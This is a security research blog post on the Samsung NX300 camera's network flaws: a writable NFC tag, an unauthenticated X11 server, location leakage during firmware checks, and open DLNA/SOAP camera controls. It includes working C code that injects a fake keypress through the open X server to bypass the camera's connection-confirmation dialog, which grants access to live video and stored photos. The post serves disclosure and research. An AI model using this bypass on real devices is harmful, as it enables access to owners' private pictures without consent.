The Samsung NX300 smart camera is a middle-class mirrorless camera with NFC and WiFi connectivity. You can connect it with your local WiFi network to upload directly to cloud services, share pictures via DLNA or obtain remote access from your smartphone. For the latter, the camera provides the Remote Viewfinder and MobileLink modes where it creates an unencrypted access point with wide-open access to its X server and any data which you would expect only to be available to your smartphone.

Because hardware engineers suck at software security, nothing else was to be expected. Nevertheless, the following will show how badly they suck, if only for documentation purposes.

This post is only covering the network connectivity of the NX300. Read the follow-up posts for getting a root shell and adding features to the camera. The smartphone app deserves some attention as well. Feel free to do your own research and post it to the project wiki.

The findings in this blog post are based on firmware version 1.31.

NFC Tag

The NFC "connectivity" is an NTAG203 created by NXP, which is pre-programmed with an NDEF message to download and launch the (horribly designed) Samsung SMART CAMERA App from Google Play, and to inform the app about the access point name provided by this individual camera:

    Type:    MIME: application/com.samsungimaging.connectionmanager
    Payload: AP_SSC_NX300_0-XX:XX:XX
    Type:    EXTERNAL: urn:nfc:ext:android.com:pkg
    Payload: com.samsungimaging.connectionmanager

The tag is writable, so a malicious user can easily "hack" your camera by rewriting its tag to download some evil app, or to open nasty links in your web browser, merely by touching it with an NFC-enabled smartphone. This was confirmed by replacing the tag content with a URL.

The deployed tag supports permanent write-locking, so if you know a prankster nerd, you might end up with a camera stuck redirecting you to a hardcore porn site.
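To make the tag contents above concrete, here is an added example (not code from the original post) that encodes the camera's two NDEF records, decodes them back, and checks whether a tag dump still carries exactly the expected records, which is the check you would run on a camera that may have been touched by someone else. The byte layout follows the NDEF record format (flag bits, type length, payload length); the record values are taken from the listing, with the masked SSID suffix kept as on the page.

```python
import struct

TNF_NAMES = {0: "EMPTY", 1: "WELL_KNOWN", 2: "MIME", 3: "URI", 4: "EXTERNAL"}
MB, ME, SR, IL = 0x80, 0x40, 0x10, 0x08   # NDEF record header flag bits

# Constructed from the post's listing: (TNF, record type, payload)
CAMERA_TAG = [
    (2, b"application/com.samsungimaging.connectionmanager", b"AP_SSC_NX300_0-XX:XX:XX"),
    (4, b"android.com:pkg", b"com.samsungimaging.connectionmanager"),
]

def encode_ndef(records):
    """Serialise (tnf, type, payload) tuples into one NDEF message (short records only)."""
    out = bytearray()
    for i, (tnf, rtype, payload) in enumerate(records):
        flags = (tnf & 0x07) | SR | (MB if i == 0 else 0) | (ME if i == len(records) - 1 else 0)
        out += bytes([flags, len(rtype), len(payload)]) + rtype + payload   # payload < 256 bytes
    return bytes(out)

def decode_ndef(data):
    """Parse an NDEF message into (tnf_name, type, payload) tuples."""
    records, pos = [], 0
    while pos < len(data):
        flags, type_len = data[pos], data[pos + 1]
        pos += 2
        if flags & SR:
            payload_len, pos = data[pos], pos + 1
        else:
            payload_len, pos = struct.unpack(">I", data[pos:pos + 4])[0], pos + 4
        id_len = 0
        if flags & IL:                             # optional ID field
            id_len, pos = data[pos], pos + 1
        rtype = data[pos:pos + type_len].decode()
        pos += type_len + id_len                   # skip type and (unused) ID
        payload = data[pos:pos + payload_len].decode(errors="replace")
        pos += payload_len
        records.append((TNF_NAMES.get(flags & 0x07, "OTHER"), rtype, payload))
        if flags & ME:                             # message end
            break
    return records

def tag_is_expected(data, ssid_prefix="AP_SSC_NX300_"):
    """True only if the tag still carries exactly the two records the camera ships with."""
    recs = decode_ndef(data)
    return (len(recs) == 2
            and recs[0][:2] == ("MIME", "application/com.samsungimaging.connectionmanager")
            and recs[0][2].startswith(ssid_prefix)
            and recs[1] == ("EXTERNAL", "android.com:pkg", "com.samsungimaging.connectionmanager"))
```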

WiFi Networking

You can configure the NX300 to join your WiFi network, where it behaves like a regular client with some open services, like DLNA. Let us see what exactly is offered by performing a port scan:

    megavolt:~# nmap -sS -O nx300

    Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET
    Nmap scan report for nx300.local (192.168.0.147)
    Host is up (0.0089s latency).
    Not shown: 999 closed ports
    PORT     STATE SERVICE
    6000/tcp open  X11
    MAC Address: A0:21:95:**:**:** (Unknown)
    No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

This scan was performed while the "E-Mail" application was open. In AllShare Play and MobileLink modes, 7676/tcp is opened in addition. Further, in Remote Viewfinder mode, the camera also opens 7679/tcp.

X Server

Wait, what? X11 as an open service? Could that be true? Surely it has TCP access control enabled to prevent abuse?

    georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
    -misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1
    -misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1
    -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
    6x13
    cursor
    fixed
    georg@megavolt:~$ DISPLAY=nx300:0 xrandr
    Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
    LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
       480x800        60.0*+
    HDMI1 disconnected (normal left inverted right x axis y axis)
    georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
    Defaulting to search window name, class, and classname
    Enlightenment Background
    acdaemon,key,receiver
    Enlightenment Black Zone (0)
    Enlightenment Frame
    di-camera-app-nx300
    Enlightenment Frame
    smart-wifi-app-nx300

Nope! This is really an unprotected X server! It is running Enlightenment! And we can even run apps on it! But besides displaying stuff on the camera the fun seems very limited:

X11 Key Bindings

A quick look with xev shows that the physical keys on the camera body are bound to X11 key events as follows:

    Key           X11 keysym
    On/Off        XF86PowerOff (only when turning off)
    Scroll Wheel  XF86ScrollUp / XF86ScrollDown
    Direct Link   XF86Mail
    Mode Wheel    F1 .. F10
    Video Rec     XF86WebCam
    +/-           XF86Reload
    Menu          Menu
    Fn            XF86HomePage
    Keypad        KP_Left .. KP_Down, KP_Enter
    Play          XF86Tools
    Delete        KP_Delete

When the camera goes online, it performs a firmware version check. First, it retrieves http://gld.samsungosp.com:

Request:

    GET / HTTP/1.1
    Content-Type: text/xml;charset=utf-8
    Accept: application/x-shockwave-flash, application/vnd.ms-excel, */*
    Accept-Language: ko
    User-Agent: Mozilla/4.0
    Host: gld.samsungosp.com

Response:

    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Type: text/html
    Date: Thu, 28 Nov 2013 16:23:48 GMT
    Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT
    Server: nginx/0.7.65
    Content-Length: 7
    Connection: keep-alive

    200 OK

This really looks like a no-op. But maybe this is a backdoor to allow for remote code execution? Who knows...

Then, a query to http://ipv4.connman.net/online/status.html returns an empty document, but has your location data (apparently obtained from the IP) in the headers:

    X-ConnMan-Status: online
    X-ConnMan-Client-IP: ###.###.##.###
    X-ConnMan-Client-Address: ###.###.##.###
    X-ConnMan-Client-Continent: EU
    X-ConnMan-Client-Country: DE
    X-ConnMan-Client-Region: ##
    X-ConnMan-Client-City: ###### (my actual city)
    X-ConnMan-Client-Latitude: ##.166698
    X-ConnMan-Client-Longitude: ##.666700
    X-ConnMan-Client-Timezone: Europe/Berlin

Wow! They know where I live! At least they do not transmit any unique identifiers with the query.

As the last step, the camera asks for firmware versions and is redirected to an XML document with the ChangeLog.

Known versions so far:

WiFi Access Point: UPnP/DLNA

Two of the on-camera apps (MobileLink, Remote Viewfinder) open an unencrypted access point named AP_SSC_NX300_0-XX:XX:XX (where XX:XX:XX is the device part of its MAC address). Fortunately, Samsung's engineers were smart and added a user confirmation dialog to the camera UI, to prevent remote abuse:

Unfortunately, this dialog is running on a wide-open X server, so all we need is to fake a KP_Return event (based on an example by bharathisubramanian), and we can connect with whichever client, stream live video or download all the private pictures from the SD card, depending on the enabled mode:

    #include <X11/Xlib.h>
    #include <X11/Intrinsic.h>
    #include <X11/keysym.h>
    #include <X11/extensions/XTest.h>
    #include <unistd.h>

    /* Send Fake Key Event */
    static void SendKey(Display *disp, KeySym keysym, KeySym modsym)
    {
        KeyCode keycode = 0, modcode = 0;

        keycode = XKeysymToKeycode(disp, keysym);
        if (keycode == 0)
            return;
        XTestGrabControl(disp, True);

        /* Generate modkey press */
        if (modsym != 0) {
            modcode = XKeysymToKeycode(disp, modsym);
            XTestFakeKeyEvent(disp, modcode, True, 0);
        }

        /* Generate regular key press and release */
        XTestFakeKeyEvent(disp, keycode, True, 0);
        XTestFakeKeyEvent(disp, keycode, False, 0);

        /* Generate modkey release */
        if (modsym != 0)
            XTestFakeKeyEvent(disp, modcode, False, 0);

        XSync(disp, False);
        XTestGrabControl(disp, False);
    }

    /* Main Function */
    int main(void)
    {
        Display *disp = XOpenDisplay(NULL);   /* display taken from $DISPLAY */
        if (disp == NULL)
            return 1;
        sleep(1);
        /* Send Return */
        SendKey(disp, XK_Return, 0);
        XCloseDisplay(disp);
        return 0;
    }

DLNA Service: Remote Viewfinder

The DLNA service exposes some camera features, which are queried and used by the Android app. The device's friendly name is [Camera]NX300, as can be queried via HTTP from http://nx300:7676/smp_2_:

    <dlna:X_DLNADOC>DMS-1.50</dlna:X_DLNADOC>
    <deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>
    <friendlyName>[Camera]NX300</friendlyName>
    <manufacturer>Samsung Electronics</manufacturer>
    <manufacturerURL>http://www.samsung.com</manufacturerURL>
    <modelDescription>Samsung Camera DMS</modelDescription>
    <modelName>SP1</modelName>
    <modelNumber>1.0</modelNumber>
    <modelURL>http://www.samsung.com</modelURL>
    <serialNumber>20081113 Folderview</serialNumber>
    <sec:X_ProductCap>smi,getMediaInfo.sec,getCaptionInfo.sec</sec:X_ProductCap>
    <UDN>uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX</UDN>
    <serviceList>
      <service>
        <serviceType>urn:schemas-upnp-org:service:ContentDirectory:1</serviceType>
        <serviceId>urn:upnp-org:serviceId:ContentDirectory</serviceId>
        <controlURL>/smp_4_</controlURL>
        <eventSubURL>/smp_5_</eventSubURL>
        <SCPDURL>/smp_3_</SCPDURL>
      </service>
      <service>
        <serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
        <serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>
        <controlURL>/smp_7_</controlURL>
        <eventSubURL>/smp_8_</eventSubURL>
        <SCPDURL>/smp_6_</SCPDURL>
      </service>
    </serviceList>
    <sec:deviceID></sec:deviceID>
    </device>

Additional SOAP services are provided for changing settings like focus and flash (/smp_3_):

    Function               Arguments                                      Result
    GetSystemUpdateID                                                     Id
    GetSearchCapabilities                                                 SearchCaps
    GetSortCapabilities                                                   SortCaps
    Browse                 ObjectID, BrowseFlag, Filter, StartingIndex,   Result, NumberReturned,
                           RequestedCount, SortCriteria                   TotalMatches, UpdateID
    GetIP                                                                 GETIPRESULT
    GetInfomation                                                         GETINFORMATIONRESULT, StreamUrl
    SetResolution          RESOLUTION
    ZoomIN                                                                CURRENTZOOM
    ZoomOUT                                                               CURRENTZOOM
    MULTIAF                                                               AFSTATUS
    AF                                                                    AFSTATUS
    setTouchAFOption       TOUCH_AF_OPTION                                SET_OPTION_RESULT
    touchAF                AFPOSITION                                     TOUCHAF_RESULT
    AFRELEASE                                                             AFRELEASERESULT
    ReleaseSelfTimer                                                      RELEASETIMER
    Shot                                                                  AFSHOTRESULT
    ShotWithGPS            GPSINFO                                        AFSHOTRESULT
    SetLED                 LEDTIME
    SetFlash               FLASHMODE
    SetStreamQuality       Quality

Another service is available for picture / video streaming (/smp_4_):

    <?xml version="1.0" encoding="utf-8"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <s:Body>
        <u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
          <GETINFORMATIONRESULT>
            <Resolutions>
              <Resolution><Width>5472</Width><Height>3648</Height></Resolution>
              <Resolution><Width>1920</Width><Height>1080</Height></Resolution>
            </Resolutions>
            <Flash>
              <Supports><Support>off</Support><Support>auto</Support></Supports>
              <Defaultflash>auto</Defaultflash>
            </Flash>
            <FlashDisplay>
              <Supports><Support>off</Support><Support>auto</Support></Supports>
              <CurrentFlashDisplay>off</CurrentFlashDisplay>
            </FlashDisplay>
            <ZoomInfo>
              <DefaultZoom>0</DefaultZoom>
              <MaxZoom>1</MaxZoom>
            </ZoomInfo>
            <AVAILSHOTS>289</AVAILSHOTS>
            <ROTATION>1</ROTATION>
            <StreamQuality>
              <Quality><Option>high</Option><Option>low</Option></Quality>
              <Default>high</Default>
            </StreamQuality>
          </GETINFORMATIONRESULT>
          <StreamUrl>
            <QualityHighUrl>http://192.168.102.1:7679/livestream.avi</QualityHighUrl>
            <QualityLowUrl>http://192.168.102.1:7679/qvga_livestream.avi</QualityLowUrl>
          </StreamUrl>
        </u:GetInfomationResponse>
      </s:Body>
    </s:Envelope>

After triggering the right commands, a live video stream should be available from http://nx300:7679/livestream.avi. However, a brief attempt to get some video with wget or mplayer failed.
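To show how the app (or an auditor inventorying the camera's attack surface) reads the two documents above, here is an added example that is not from the original post: it parses a UPnP device description like the /smp_2_ listing into the friendly name and per-service control URLs, and parses a GetInfomationResponse into resolutions, remaining shots and the advertised stream URLs. Both XML strings are constructed from the page's listings, trimmed, with the UPnP device namespace declared so they parse.

```python
import xml.etree.ElementTree as ET

UPNP = "{urn:schemas-upnp-org:device-1-0}"
SOAP = "{http://schemas.xmlsoap.org/soap/envelope/}"
CDS = "{urn:schemas-upnp-org:service:ContentDirectory:1}"

# Constructed from the post's /smp_2_ listing (trimmed; namespace added so it parses)
DEVICE_DESC = """<root xmlns="urn:schemas-upnp-org:device-1-0"><device>
<deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>
<friendlyName>[Camera]NX300</friendlyName><serviceList>
<service><serviceType>urn:schemas-upnp-org:service:ContentDirectory:1</serviceType>
<controlURL>/smp_4_</controlURL><SCPDURL>/smp_3_</SCPDURL></service>
<service><serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
<controlURL>/smp_7_</controlURL><SCPDURL>/smp_6_</SCPDURL></service>
</serviceList></device></root>"""

# Constructed from the post's GetInfomationResponse listing (trimmed)
GET_INFO_RESPONSE = """<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>
<u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
<GETINFORMATIONRESULT><Resolutions>
<Resolution><Width>5472</Width><Height>3648</Height></Resolution>
<Resolution><Width>1920</Width><Height>1080</Height></Resolution></Resolutions>
<AVAILSHOTS>289</AVAILSHOTS></GETINFORMATIONRESULT>
<StreamUrl><QualityHighUrl>http://192.168.102.1:7679/livestream.avi</QualityHighUrl>
<QualityLowUrl>http://192.168.102.1:7679/qvga_livestream.avi</QualityLowUrl></StreamUrl>
</u:GetInfomationResponse></s:Body></s:Envelope>"""

def parse_device_description(xml_text):
    """Friendly name plus {serviceType: (controlURL, SCPDURL)} from a UPnP device description."""
    dev = ET.fromstring(xml_text).find(UPNP + "device")
    services = {s.findtext(UPNP + "serviceType"): (s.findtext(UPNP + "controlURL"),
                                                   s.findtext(UPNP + "SCPDURL"))
                for s in dev.iter(UPNP + "service")}
    return {"friendlyName": dev.findtext(UPNP + "friendlyName"), "services": services}

def parse_get_information(xml_text):
    """Resolutions, remaining shots and live-stream URLs from a GetInfomation SOAP response."""
    resp = ET.fromstring(xml_text).find(SOAP + "Body/" + CDS + "GetInfomationResponse")
    info = resp.find("GETINFORMATIONRESULT")     # result children carry no namespace
    return {
        "resolutions": [(int(r.findtext("Width")), int(r.findtext("Height")))
                        for r in info.iter("Resolution")],
        "availshots": int(info.findtext("AVAILSHOTS")),
        "streams": {u.tag: u.text for u in resp.find("StreamUrl")},
    }
```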

Firmware "Source Code"

The "source code" package provided on Samsung's OSS Release Center is 834 MBytes compressed and mainly contains three copies of the rootfs image (400-500MB each), and then some scripts. The actual build root is hidden under the second paper sheet link in the "Announcements" column.

Also, there are Obamapics in TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO .

The project is built on an ancient version of Tizen, on which I am no expert. Somebody else needs to take this stuff apart, make a proper build environment, or port OpenWRT to it.
